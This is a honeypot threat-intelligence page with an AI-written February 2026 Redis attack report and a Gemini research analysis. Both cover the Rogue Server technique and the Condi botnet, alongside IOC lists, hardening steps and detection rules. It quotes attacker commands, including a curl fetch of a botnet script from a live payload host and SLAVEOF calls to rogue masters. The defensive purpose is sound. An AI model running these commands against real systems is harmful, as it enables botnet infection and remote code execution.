Honeypot overview
Redis protocol honeypot monitoring unauthenticated access attempts and exploitation. Indicators flow from STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.
NadSec Honeypot
Everything here is malicious on purpose. No production data.
Data source
T-Pot CE
Raw logs to STIX to OTX pulse.
Report author
Robert AI
Summaries and snark only.
Snapshot
Quick stats parsed from the current month STIX export.
Unique IP indicators
0
Distinct source IPs in the STIX bundle.
Hash indicators
0
File hashes associated with Redis activity.
Indicator objects
Scope
Redis-only indicators
Signals come strictly from the Redis honeypot STIX bundle. No cross-talk from other services.
What to do
Drop into deny lists
Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.
Caveats
Noisy on purpose
Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.
Monthly report
REPORT DESIGNATION: NADSEC-INTEL-2026-02-REDIS-THREAT-MATRIX
AUTHOR: ROBERT (Senior Threat Intelligence Goblin / Caffeinated Chaos Engine)
DATE: March 01, 2026
CLASSIFICATION: TLP:CLEAR (Share freely. Print it. Wallpaper your SOC with it.)
SUBJECT: February 2026 Redis Analysis: "The SlaveOf Your Nightmares"
If I had a dollar for every time I saw a Redis instance exposed to the public internet with no authentication, I wouldn't be writing this report. I'd be on a beach in Fiji, far away from the glowing screens of the NadSec SOC. But alas, here we are.
February 2026 was a banner month for people who think "Database" means "Public Bulletin Board." Our Sydney-based Redis honeypot (TCP 6379) was absolutely hammered, recording 18,838 attack events from 759 unique IP addresses. If you thought the threat landscape was evolving into something sophisticated and elegant, let me disabuse you of that notion immediately. It’s mostly scripts, skids, and botnets smashing the SLAVEOF command like a toddler with a hammer.
The primary theme of February was the "Rogue Server" technique. Attackers aren't just trying to guess your password (though they do that too); they are actively trying to enslave your Redis instance, force it to synchronize with a malicious master server, and load a compiled module (exp.so) to gain Remote Code Execution (RCE). It’s clever, it’s old, and it still works because nobody reads the manual.
We also observed significant activity linked to the Condi botnet (a Mirai variant that refuses to die) and the P2Pinfect worm. The infrastructure supporting these campaigns is a mix of compromised legitimate cloud tenants (AWS, DigitalOcean are the usual suspects) and "bulletproof" hosting providers that ignore abuse reports harder than I ignore decaf coffee.
Key Findings:
SLAVEOF or REPLICAOF commands attempting to load malicious shared objects.jack5tr.sh) links a large chunk of activity to the Condi botnet, aimed at recruiting Linux/IoT devices for DDoS-for-hire services.The following table represents the "noisy neighbors" of the internet. If you see these IPs in your logs, block them. Then burn the logs.
| Rank | IP Address | Country | ASN | Organization | Event Volume | Primary Activity |
|---|---|---|---|---|---|---|
| 1 | 14.103.78.216 |
CN | AS4811 | China Telecom Group | 818 | Rogue Server Scanner / C2 Link |
| 2 | 156.146.57.178 |
SG | AS212238 | Datacamp Limited | 506 | Bruteforce / Command Injection |
| 3 | 3.131.220.121 |
US | AS16509 | Amazon.com, Inc. | 104 | SSH/Redis Bruteforce |
| 4 | 18.116.101.220 |
US | AS16509 | Amazon.com, Inc. | 101 | SSH/Redis Bruteforce |
| 5 | 3.135.20.78 |
US | AS16509 | Amazon.com, Inc. | 101 | SSH/Redis Bruteforce |
| 6 | 3.129.187.38 |
US | AS16509 | Amazon.com, Inc. | 100 | SSH/Redis Bruteforce |
| 7 | 18.191.106.209 |
US | AS16509 | Amazon.com, Inc. | 99 | SSH/Redis Bruteforce |
| 8 | 16.58.56.214 |
US | AS16509 | Amazon.com, Inc. | 99 | SSH/Redis Bruteforce |
| 9 | 3.130.168.2 |
US | AS16509 | Amazon.com, Inc. | 98 | SSH/Redis Bruteforce |
| 10 | 18.191.52.107 |
US | AS16509 | Amazon.com, Inc. | 97 | SSH/Redis Bruteforce |
| 11 | 18.222.199.88 |
US | AS16509 | Amazon.com, Inc. | 96 | SSH/Redis Bruteforce |
| 12 | 3.130.96.91 |
US | AS16509 | Amazon.com, Inc. | 86 | SSH/Redis Bruteforce |
| 13 | 3.14.72.188 |
US | AS16509 | Amazon.com, Inc. | 82 | SSH/Redis Bruteforce |
| 14 | 47.84.198.211 |
SG | AS45102 | Alibaba US Tech | 66 | Scanning / Probe |
| 15 | 152.32.206.181 |
US | AS135377 | UCLOUD INFO TECH | 58 | Bruteforce |
| 16 | 152.32.207.42 |
US | AS135377 | UCLOUD INFO TECH | 54 | Bruteforce |
| 17 | 3.132.26.232 |
US | AS16509 | Amazon.com, Inc. | 50 | Bruteforce |
| 18 | 64.52.80.240 |
US | AS399629 | BL Networks | 46 | Lua Scripting Exploit |
| 19 | 27.37.68.89 |
CN | AS17816 | China Unicom | 41 | Rogue Server / Config Mod |
| 20 | 47.242.108.71 |
HK | AS45102 | Alibaba US Tech | 39 | Rogue Server / C2 |
A look at whose networks are housing these digital delinquents.
| Rank | ASN | Organization | Event Count | Goblin Rating | Notes |
|---|---|---|---|---|---|
| 1 | AS16509 | Amazon.com, Inc. | 2,645 | 💀💀 | Compromised EC2 instances everywhere. |
| 2 | AS4134 | China Telecom Group | 2,049 | 💀💀💀 | The backbone of background radiation. |
| 3 | AS49870 | Alsycon B.V. | 2,039 | 💀💀💀💀 | Known bulletproof haven. |
| 4 | AS8075 | Microsoft Corporation | 1,315 | 💀💀 | Azure tenants behaving badly. |
| 5 | AS14061 | DigitalOcean, LLC | 1,239 | 💀💀 | Droplets of doom. |
| 6 | AS6939 | Hurricane Electric LLC | 813 | 💀 | Backbone transit, hard to blame directly. |
| 7 | AS37963 | Alibaba Advertising | 705 | 💀💀 | High volume scanners. |
| 8 | AS398324 | Censys, Inc. | 563 | 😐 | Research scanners (Benign but noisy). |
| 9 | AS212238 | Datacamp Limited | 506 | 💀💀💀 | Often hosts shady proxies. |
| 10 | AS396982 | Google LLC | 401 | 💀💀 | GCP abuse. |
SLAVEOF/REPLICAOF): 42% - The primary vector for RCE.AUTH): 35% - Good old-fashioned dictionary attacks.INFO, CONFIG GET): 15% - Mapping the environment.EVAL): 5% - Attempts to bypass sandbox via Lua.Attribution: Condi Botnet (Mirai Variant)
Primary Artifacts: jack5tr.sh, j.sh, 160.30.159.104
This campaign is aggressive and loud. The attackers utilize a script often named jack5tr.sh (or just j.sh for the lazy typists). The infection chain usually starts with a command injection via Redis or a successful bruteforce. Once in, the script curls a payload from 160.30.159.104 (hosted by SWAN, a.s. in Slovakia, a network that seems to have a high tolerance for shenanigans).
The script is a classic Mirai derivative. It kills competing botnets (because there's no honor among thieves), modifies crontab for persistence, and downloads binaries compiled for every architecture under the sun (MIPS, ARM, x86). The goal? DDoS-as-a-service. If your smart toaster is running Redis and is suddenly sluggish, it's probably DDOSing a Minecraft server right now.
Attribution: P2Pinfect / Redis-Rogue-Server
Primary Artifacts: exp.so, SLAVEOF, High-port C2s (178.62.63.125:60147)
This is the sophisticated one. Instead of just running shell commands, these actors use the Redis "Rogue Server" technique. They connect to your Redis instance and issue a SLAVEOF command, telling your database that their server is the master. Your Redis instance obediently connects to the attacker (e.g., 178.62.63.125) and requests a synchronization.
The attacker sends back a "database dump" that is actually a compiled malicious shared object (exp.so). Once the transfer is complete, the attacker issues a MODULE LOAD command to load this file into the Redis kernel. Boom. They now have new commands available that bypass the Redis sandbox and allow direct OS command execution. It's elegant, terrifying, and entirely preventable if you just used a firewall.
Attribution: Unknown Opportunists
Primary Artifacts: IPs from PebbleHost (85.11.182.23)
We observed a distinct cluster of attacks originating from PebbleHost, a provider specializing in Minecraft and game servers. This suggests one of two things:
Given the volume, I'm betting on compromised containers. It's a reminder that "low value" targets are just "high bandwidth" launchpads to an attacker.
These networks showed up repeatedly hosting C2 nodes or malicious payloads.
160.30.159.104).The "Big Three" (and DigitalOcean) are, as always, the unwitting accomplices.
178.62.63.125) acting as long-term Rogue Masters, which suggests DO's abuse detection for high-port traffic might need some more coffee.Signature: jack5tr.sh
Behavior:
curl or wget.kill -9's them./var/spool/cron/root and /etc/crontab.bin.x86, bin.arm7).exp.so)Signature: SLAVEOF <IP> <HighPort> followed by MODULE LOAD ./exp.so
Behavior:
dbfilename to exp.so.SLAVEOF pointing to a malicious server..so file as if it were a database backup.SLAVEOF NO ONE to detach, and MODULE UNLOAD to hide tracks, though they often leave the exp.so file behind like a calling card.| Tactic | Technique ID | Technique Name | Observation |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Targeting exposed Redis on TCP/6379. |
| Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of jack5tr.sh and shell commands via Redis. |
| Execution | T1203 | Exploitation for Client Execution | Forcing Redis to sync with a rogue master (SLAVEOF). |
| Persistence | T1053.003 | Scheduled Task/Job: Cron | Malware writes to /var/spool/cron/root. |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Killing competing botnet processes and disabling security tools. |
| Defense Evasion | T1027 | Obfuscated Files or Information | Using compiled modules (exp.so) to hide code execution logic. |
| Discovery | T1046 | Network Service Scanning | Massive scanning of port 6379 across the internet. |
If you are running Redis as root exposed to the internet, you have already failed. But if you insist on living dangerously, do this:
redis.conf and set bind 127.0.0.1.requirepass. "redis", "password", and "123456" are not strong passwords.redis.conf, neuter the commands attackers use:rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
If you rename them to an empty string, they are disabled. If you need them, rename them to something a script kiddie won't guess, like SUPER_SECRET_SLAVEOF_99.Stop the bleeding at the network layer.
# Allow local access
iptables -A INPUT -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
# Allow specific app server
iptables -A INPUT -p tcp --dport 6379 -s 10.0.0.5 -j ACCEPT
# Drop everything else (log it so you can laugh later)
iptables -A INPUT -p tcp --dport 6379 -j LOG --log-prefix "REDIS_DROP: "
iptables -A INPUT -p tcp --dport 6379 -j DROP
Splunk:
index=redis_logs "SLAVEOF" OR "REPLICAOF" OR "MODULE LOAD"
| stats count by src_ip, command, dest_port
| sort - count
Elastic (KQL):
message: ("SLAVEOF" OR "REPLICAOF" OR "MODULE LOAD") AND destination.port: 6379
Detect exp.so Transfer:
alert tcp any any -> $HOME_NET 6379 (msg:"NADSEC INTEL - Redis Rogue Server Module Load Attempt"; flow:established,to_server; content:"MODULE LOAD"; nocase; content:"exp.so"; distance:0; classtype:attempted-admin; sid:1000005; rev:1;)
Detect Condi Downloader:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"NADSEC INTEL - Condi/Mirai Downloader (jack5tr)"; flow:established,to_server; http.uri; content:"jack5tr.sh"; fast_pattern; classtype:trojan-activity; sid:1000006; rev:1;)
178.62.63.125 (GB, DigitalOcean) - High Confidence - P2Pinfect Rogue Master.160.30.159.104 (SK, SWAN) - High Confidence - Condi Payload Server (jack5tr.sh).8.222.174.150 (US, Alibaba) - Rogue Master.8.219.221.124 (SG, Alibaba) - Rogue Master.47.237.133.220 (US, Alibaba) - Rogue Master.14.103.78.216 (CN)156.146.57.178 (SG)51.254.196.211 (FR)196.190.220.129 (ET)47.242.108.71 (HK)219.151.190.164 (CN)115.190.242.241 (CN)39.105.210.120 (CN)27.37.68.89 (CN)51.254.196.211 (FR)exp.sojack5tr.shj.shsystem.execbackup.db (Often malicious if pushed via SLAVEOF)Another month, another 18,000 attempts to turn a database into a botnet node. The persistence of the "Rogue Server" technique proves one thing: technical debt is the security industry's job security.
These attacks aren't sophisticated zero-days. They are the digital equivalent of trying every doorknob in the neighborhood. If your door is unlocked (no auth) and you're shouting your address (public IP), don't be surprised when a goblin walks in and starts mining Dogecoin on your CPU.
Prediction for March: We will see an uptick in P2Pinfect variants as they refine their peer-to-peer resilience. Also, I predict I will need more coffee.
Lock down your Redis instances. Don't make me come over there.
Gemini Deep Research Analysis
Extended context and threat landscape research
# Redis Database Exploit Attempts - NadSec - 2026-02
**Key Points:**
* **High-Volume Targeting of Redis Services:** In February 2026, the NadSec Redis Honeypot in Sydney recorded 18,838 attack events from 759 unique IP addresses. The activity was dominated by attempts to exploit Redis's replication features (`SLAVEOF`/`REPLICAOF`) to achieve Remote Code Execution (RCE).
* **Prevalence of "Rogue Server" Technique:** A significant portion of the attacks utilized the "Redis Rogue Server" technique. Attackers commanded the honeypot to synchronize with malicious master servers (e.g., `178.62.63.125`, `8.222.174.150`) to transfer and load malicious shared object modules (`exp.so`), bypassing authentication mechanisms to execute arbitrary system commands.
* **Condi and Mirai Botnet Campaigns:** Analysis of payloads such as `jack5tr.sh` and `j.sh` strongly links this activity to the **Condi** botnet, a Mirai variant known for exploiting unpatched routers and IoT devices. The infrastructure mapping reveals a reliance on compromised cloud hosts and specific bulletproof or abused hosting providers (e.g., DigitalOcean, Alibaba Cloud, and specific residential/hosting proxies) for payload delivery.
* **Infrastructure Abuse:** Top attacking ASNs included **Amazon.com, Inc.**, **China Telecom Group**, and **Alsycon B.V.**, suggesting a mix of compromised legitimate cloud infrastructure and potentially dedicated attack servers. Notably, activity from **PebbleHost** (a game server provider) indicates the likely compromise of gaming VPS instances for scanning purposes.
## 1. Executive Summary
This threat intelligence report details a sustained campaign of exploit attempts targeting Redis database servers during February 2026. Data collected from the NadSec T-Pot honeypot infrastructure in Sydney, Australia, reveals a highly automated and aggressive effort to compromise exposed Redis instances on TCP port 6379.
The primary attack vector observed was the abuse of Redis replication functionality. Threat actors attempted to force the honeypot to act as a "slave" or "replica" to a rogue master server controlled by the attacker. This mechanism allows the attacker to push a malicious compiled module (often named `exp.so`) to the victim server. Once loaded via the `MODULE LOAD` command, this module provides the attacker with the ability to execute shell commands on the host system, effectively bypassing the Redis sandbox.
Payload analysis confirms the presence of the **Condi** botnet (identified via the `jack5tr.sh` script) and likely **P2Pinfect** or similar worm-like variants that utilize Redis for propagation. The campaigns are characterized by the retrieval of ELF binaries targeting multiple architectures (ARM, x86, MIPS), indicating a broad targeting of both Linux servers and IoT devices. Geographically, the attacks originated predominantly from the United States and China, with significant support infrastructure located in the Netherlands and Singapore.
## 2. Statistical Overview
The following data characterizes the threat landscape observed by the NadSec Redis Honeypot in February 2026.
**Table 1: Global Attack Statistics**
| Metric | Count |
| :--- | :--- |
| **Total Attacks** | 18,838 |
| **Unique Attacker IPs** | 759 |
| **Targeted Port** | 6379 (Redis) |
| **Attack Type** | Scanning, Bruteforce, Exploitation (Rogue Server) |
**Table 2: Top 5 Attacker Countries**
| Country | Event Count | % of Total | Context |
| :--- | :--- | :--- | :--- |
| **United States** | 8,611 | 45.7% | High volume of compromised cloud assets (DigitalOcean, AWS). |
| **China** | 4,791 | 25.4% | Combination of scanning infrastructure and C2 nodes (Alibaba). |
| **Netherlands** | 1,607 | 8.5% | Significant hosting of C2 and scanning servers (Alsycon B.V.). |
| **Singapore** | 794 | 4.2% | Hosting abuse (Datacamp Limited). |
| **Russia** | 638 | 3.4% | Bruteforce and scanning activity. |
**Table 3: Top 5 Attacking ASNs**
| ASN | Organization | Event Count | Classification |
| :--- | :--- | :--- | :--- |
| **AS16509** | Amazon.com, Inc. | 2,645 | Cloud Service Provider (Compromised Tenants) |
| **AS4134** | China Telecom Group | 2,049 | ISP / Backbone |
| **AS49870** | Alsycon B.V. | 2,039 | Hosting / Data Center |
| **AS8075** | Microsoft Corporation | 1,315 | Cloud Service Provider (Azure Abuse) |
| **AS14061** | DigitalOcean, LLC | 1,239 | Cloud Service Provider (Droplet Abuse) |
## 3. Infrastructure Deep Dive & IP Attribution
Analysis of the top attacking IP addresses reveals distinct clusters of activity ranging from compromised cloud infrastructure to dedicated command and control (C2) servers.
### 3.1. Rogue Master Servers (The "SlaveOf" Technique)
The most critical infrastructure identified in this campaign are the IPs designated as "masters" in the `SLAVEOF` or `REPLICAOF` commands. These servers are configured to serve the malicious `exp.so` module to the honeypot.
* **178.62.63.125 (DigitalOcean, GB)**
* **Role:** Rogue Master / Payload Server.
* **Observed Behavior:** Targeted by attacker IP `51.254.196.211` (OVH, FR) via the command `SLAVEOF 178.62.63.125 60147`.
* **Attribution:** Threat intelligence sources link this IP to the distribution of P2Pinfect and Mirai-variant malware. It has historically hosted malicious binaries accessible via high ports (e.g., port 60147) serving ELF binaries [cite: 1, 2].
* **Context:** The usage of high ports for serving the rogue module is a common evasion technique to bypass simple web scanning.
* **8.222.174.150 (Alibaba US Technology Co., Ltd., US)**
* **Role:** Rogue Master.
* **Observed Behavior:** Targeted by attacker IP `196.190.220.129` (Ethio Telecom, ET) via `SLAVEOF 8.222.174.150 60111`.
* **Attribution:** Hosted on Alibaba Cloud infrastructure in the US [cite: 3, 4]. The interaction pattern confirms this host is configured to synchronize malicious data to victims.
* **160.30.159.104 (SWAN, a.s., SK)**
* **Role:** Primary Payload Delivery Server.
* **Observed Behavior:** The attacker IP `103.253.21.199` (VN) attempted to execute a script downloaded from this host: `curl -sL http://160.30.159.104/j.sh`.
* **Attribution:** This IP is a known distribution point for the **Condi** botnet (a Mirai variant). It hosts scripts like `jack5tr.sh` and binaries for various architectures (`x86_64`, `arm7`) [cite: 5, 6].
* **Reputation:** Classified as a high-confidence threat indicator by multiple threat feeds [cite: 7, 8].
### 3.2. Scanning and Exploitation Source Clusters
A large volume of "scanner" IPs were observed initiating the attacks. These are often compromised devices or cheap VPS instances used to proxy attacks.
* **14.103.78.216 (China Telecom, CN)**
* **Activity:** 818 events. This IP was the single most active source in the dataset.
* **Behavior:** It executed `SLAVEOF` commands pointing to multiple distinct rogue masters (`8.219.221.124`, `47.237.133.220`, `47.236.26.200`), indicating it functions as a central scanning node for a larger botnet infrastructure.
* **PebbleHost IPs (e.g., 85.11.182.23, 85.11.182.27)**
* **ASN:** AS212027 (PebbleHost Ltd).
* **Context:** PebbleHost is a provider known for hosting game servers (Minecraft) [cite: 9]. The high volume of bruteforce scanning from these IPs suggests that customer containers or game servers have been compromised and repurposed for scanning, or that the provider's low-cost tier is being abused by threat actors for anonymity [cite: 10].
* **DigitalOcean & Amazon AWS Cluster**
* **ASNs:** 14061, 16509.
* **Analysis:** Thousands of events originated from these ASNs. This represents "Cloud Abuse"—legitimate cloud accounts compromised by attackers or created with stolen credit cards to provide ephemeral scanning infrastructure. The high churn rate of these IPs makes static blocklisting difficult.
## 4. Malware Analysis
The campaign relies on a multi-stage infection process involving shell scripts, compiled Redis modules, and ELF binaries.
### 4.1. The "Rogue Server" Module: `exp.so`
* **Delivery Mechanism:** This file is not downloaded via HTTP/FTP but is transferred over the Redis replication protocol. The attacker sets the victim's `dbfilename` to `exp.so` and initiates synchronization with the rogue master. The master sends the shared object file as the "database dump."
* **Functionality:** Once loaded using `MODULE LOAD ./exp.so`, the module registers new commands (commonly `system.exec`) that allow the attacker to pass arbitrary shell commands to the underlying OS [cite: 11, 12].
* **Attribution:** This technique is extensively documented in association with **P2Pinfect**, **H2Miner**, and generic Redis exploits derived from the `redis-rogue-server` proof-of-concept [cite: 11, 13, 14].
### 4.2. Downloader Script: `jack5tr.sh` / `j.sh`
* **Source:** `http://160.30.159.104/j.sh` (or `jack5tr.sh`).
* **Family Attribution:** **Condi** (Mirai Variant).
* **Behavioral Analysis:**
* **Process Killing:** The script actively searches for and terminates competing botnet processes (e.g., other crypto-miners or Mirai variants) to secure exclusive resource access.
* **Architecture Agnostic:** It downloads ELF binaries for a wide range of CPU architectures (MIPS, ARM, x86, etc.) to ensure successful infection regardless of the host hardware [cite: 15, 16].
* **Persistence:** It attempts to modify crontabs and system services to ensure the malware survives reboots.
* **Payload:** The script executes the downloaded ELF binary, which connects to a separate C2 server for DDoS instructions or cryptomining tasks. Sandbox reports confirm detection of **Mirai** and **Condi** signatures [cite: 17, 18, 19].
### 4.3. P2Pinfect Indicators
* **Behavior:** The heavy reliance on the replication feature (`SLAVEOF`) combined with high-port rogue servers (e.g., port 60147) is a specific TTP (Tactic, Technique, and Procedure) of the **P2Pinfect** worm. Unlike traditional botnets that use a central C2, P2Pinfect operates a peer-to-peer network, making takedowns significantly harder [cite: 13].
## 5. Campaign Attribution
Based on the IOCs and TTPs observed in the February 2026 dataset, two primary campaigns are active:
1. **Condi Botnet Campaign:**
* **Evidence:** Direct reference to `jack5tr.sh` and `160.30.159.104`.
* **Goal:** Recruitment of IoT devices and Linux servers into a DDoS botnet. Condi is essentially a "botnet-as-a-service" often sold on Telegram, capable of launching various flood attacks (TCP SYN, UDP, HTTP) [cite: 15, 16].
* **Targeting:** Opportunistic scanning of unpatched services, specifically targeting vulnerabilities like CVE-2023-1389 and misconfigured Redis servers [cite: 15, 16].
2. **P2Pinfect / Redis Worm Campaign:**
* **Evidence:** Use of the `SLAVEOF` command with high-port destinations and the `exp.so` module filename.
* **Goal:** Creation of a resilient, decentralized botnet. While often associated with cryptomining, P2Pinfect's robust P2P architecture allows for modular payload updates.
* **Targeting:** Specifically targets exposed Redis and MySQL instances.
## 6. Detection & Mitigation
To defend against these threats, organizations must implement defense-in-depth strategies specifically tailored to Redis environments.
### 6.1. Network & Host Mitigation
* **Firewall Rules:** Block port 6379 (Redis) from the public internet. Redis should strictly be bound to `localhost` or a private interface. Use VPNs or SSH tunnels for remote access.
* **Rename Dangerous Commands:** In `redis.conf`, rename critical commands to empty strings to disable them:
```text
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
```
* **Authentication:** Require strong authentication (ACLs) for all Redis connections.
### 6.2. SIEM & Detection Queries
**Splunk / SIEM Query for Rogue Server Activity:**
```splunk
index=honeypot_data sourcetype=redis_logs
| search command IN ("SLAVEOF", "REPLICAOF", "MODULE LOAD")
| rex field=_raw "SLAVEOF (?<rogue_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) (?<rogue_port>\d+)"
| stats count by src_ip, rogue_ip, rogue_port
```
**Suricata Signature for `exp.so` Transfer:**
```suricata
alert tcp any any -> $HOME_NET 6379 (msg:"ET EXPLOIT Redis Remote Code Execution via Rogue Server (exp.so)"; flow:established,to_server; content:"exp.so"; nocase; content:"MODULE LOAD"; distance:0; classtype:attempted-admin; sid:1000001; rev:1;)
```
**Suricata Signature for `jack5tr` Download:**
```suricata
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Condi/Mirai Downloader (jack5tr.sh)"; flow:established,to_server; http.uri; content:"jack5tr.sh"; fast_pattern; reference:url,urlhaus.abuse.ch/url/3786982/; classtype:trojan-activity; sid:1000002; rev:1;)
```
## 7. IOC Appendix
### Top 10 Attacker IPs (Scanners/Proxies)
* `14.103.78.216` (CN, China Telecom) - High volume scanner linked to multiple rogue masters.
* `156.146.57.178` (SG, Datacamp) - Bruteforce source.
* `51.254.196.211` (FR, OVH) - Initiator of P2Pinfect exploitation.
* `3.134.148.59` (US, Amazon) - Bruteforce source.
* `3.130.168.2` (US, Amazon) - Bruteforce source.
* `18.191.106.209` (US, Amazon) - Bruteforce source.
* `3.135.20.78` (US, Amazon) - Bruteforce source.
* `167.99.155.172` (US, DigitalOcean) - Bruteforce source.
* `65.49.1.222` (US, Hurricane Electric) - Bruteforce source.
* `223.76.108.98` (CN, China Mobile) - Bruteforce source.
### Rogue Master Servers (C2 / Malicious Module Hosts)
* `178.62.63.125` (GB, DigitalOcean) - **CRITICAL**: P2Pinfect/Mirai rogue master.
* `160.30.159.104` (SK, SWAN) - **CRITICAL**: Condi payload delivery (`jack5tr.sh`).
* `8.222.174.150` (US, Alibaba) - Rogue master.
* `47.237.133.220` (US, Alibaba) - Rogue master.
* `8.219.221.124` (SG, Alibaba) - Rogue master.
### Malicious Filenames & Commands
* `jack5tr.sh`, `j.sh` (Condi Downloader)
* `exp.so` (Redis RCE Module)
* `system.exec` (Command execution function within malicious module)
* `SLAVEOF NO ONE` (Command to detach from rogue master after infection)
## 8. Sources & Citations
[cite: 1, 2, 20] URLhaus Database for 178.62.63.125.
[cite: 13, 21] SOCRadar & Fortinet Research on P2Pinfect and Condi/Mirai.
[cite: 15, 16] Fortinet & Wolfpack Cybernetics Analysis of Condi/Jack5tr.
[cite: 11, 12, 14] KnownSec 404 & Github on Redis Rogue Server Exploits.
[cite: 5, 6] URLhaus Tags and Recent Payloads for `sh` and `jack5tr`.
[cite: 17, 18, 19] ANY.RUN and FileScan.IO Sandbox Reports for `jack5tr.sh`.
[cite: 9, 10] PebbleHost and BGP Tools infrastructure context.
[cite: 3, 4] IPInfo ASN data for Alibaba and DigitalOcean IPs.
**Sources:**
1. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG0LuE-K32YolRqzXIAKB4ue66YOCET2E0nA7LLzRlQwUdH403Oh8MJxgVCsiC7pwGnmyTJFE_ASSc-gh3wRZnZSybwXPa7EeYXMhBub6Js3baUvl1Gi6zkEA==)
2. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFXwBL6QLpkkFx63FJhnDscph_5wRvRSDj3mWIxEwLRqQ5bqYOgIGPX0b1wHxQitw6PYWO1dWQCAY0OdmDxz3IZimMWWiG35ucNkcC1PNMpLmSXK9nJevmTJ9cSQBm4ig==)
3. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFhoG2ejgoGlckhgkuGG2SwM2vJ4PJaL5PL-_olug2OAMMWZw2DgHNWHhuOJdbpoWjZs4bVAxT75wSHcBLms4Cem02wTcCI_QFAagfGbg6ocXK68w==)
4. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEDtpYVCj1QBRak2yvOiEbJAogsG9EtRqkz9AJhAdR975elSAOI7XoP8QU6LjMICEz6DPxArmkwLFsWd7xforEhpdsQ0NIKVUC79qKtklUdw6-lrdjcY6jwo0g=)
5. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHGTFafgdeRE1wram_4HEWfRzuRjV2ZenDXHcRJ0EHg7jb61CYXiEjHlExJ3IHur405rQoFRHB0Qd3CZzfKpbOF0gpFkS0g2tbC7CV_-AXiomMe9kZhA0TZX2QEkx4=)
6. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF3rB2Teqfd_03kyD2-sQ62pxD1VjqrMV6ojiWlKDh99Vmia6x3Rxc1kAz0vl7CGKVrmWZqaad3vQd6wjgkoCVzplPBDSvRQePXRZlSi2DRUgBmva8n8Ko3XzdzArPlgCDQ9dDs)
7. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFkPdxwL_5UV0hEmwRqSwHlFgBBufg_yOroDdH_rW5ux2CEFxvodZ-1K8C1b7jXlAARnZbe2kFl0GwkE795vL85bxNEMAZTEeDIV5hzbjExsAsr31CnYzybsLgEpJLCzXO2l0DK0MHb8XayTVomc9xcmnAh5G0tr2wo6XHXkcri8W-A-g==)
8. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH2zf5wGqU6NTlbtcMMCpWM-jO9rzOlVhyqkkI30QkXYCHu3_jIi89Nm0mEA1d5WPxOktf9UpwyPm6b0bus5tIO4-19ehFqYp9XBwWiP0z_HS9_SRFcb-ve7LZ1L-Z6wWs6jQRAt-70kOKI8eEsa8J-zoNKK8lCWF-ji-oaXhT5slix4uM41RXERv6QR5BCZ5Nfc5UQ4qv9QEHVuao=)
9. [sourceforge.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGYn7wiWi0Agy3ZJHgsWUf82NjhBgrMnNJh8b-K9AZDq3BqMMQNTRdDr8cB7ONyFWHT7uVGF_5GE8s7DIHPLND4kdY4Cp11qv8-enSLXsrWQUF0TB1HxORLXZy-cJpKWwkmcIogC8iHkbxU2EJY3mpUX6wl_W4=)
10. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEEemFF9pM33WaK1ftCUCSRJG4tO2qxJb6G_h3DeRgUSMTaon4b-TMNIZq5AtuPHqk3qGkRSKWw7aPbJPCXWGy1cKu0-7vzhMwqH4ely9PiH9c2LxJ8zo2pq_ekEX1p)
11. [medium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGTfVG9FB85rsft_J1yULONxJYTSwt0QdI8IKgLy6SRtOOHObzlCpUxtUn02Wxxiv8HAzRrkWpX1nWaXt02kWyGocKoT_b9Vm3byHXzMmm2bC0O_S4y8Mj3pL7eD8oStoiy-XzX8W7Dr0XU4-H6CenOyhFx1bIfUS-OxgDTIDJA3c_epkLDw-rDtaZxH_iIqI7YGUJbiuDK2LF8bIjpKw==)
12. [synacktiv.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGJd9DjLp1KdQTiBiQ8PCZM0mhRqKF7FUoNcU7Cwed8Xbxj-wfday69yjezyGNdsPn-rPBvYCW2-NdSA-J0USC2scEHHER4BmxeTxDi3P7YE44f2-ZI1F7PltUitAfXIzBFtEy0PusyehVN0MpMH-ytqIFnvI7WiqQGSWfAKNIEWpx8eNhZe_YRzUKsA1NGT-MxwoR41AW66ybOfacwWACPP6vzH4AtohHfMZ4=)
13. [socradar.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGd3iSWVehACMtG1NdscSl-r8t1HA7YRv4qoNCgPzGzYDrQIPl0-L5HYnbVFJZri5WMHIcRWWZXD30dp-Gy-obrfetifCl5Rrz_tObWT_r6psgcDdHbUjND9fwwOyqRwccN0bcUWa3DZRO8M2dM4iq3Vf5J4Ekm-hgRy6asxw5Csu_iutaieaqKgmrTWcjdETA=)
14. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEHM_ZbJ94RPO_QcU-do9vM4tPb9anDhFD4cqq450KYocIvIJdGg6M0AE-Xs4eCBz7O8CqEb7xk3Ogmat9L8Bah0bKmTIBEPO4a3CQ_Orzm_FLZ54QRbfDJhw==)
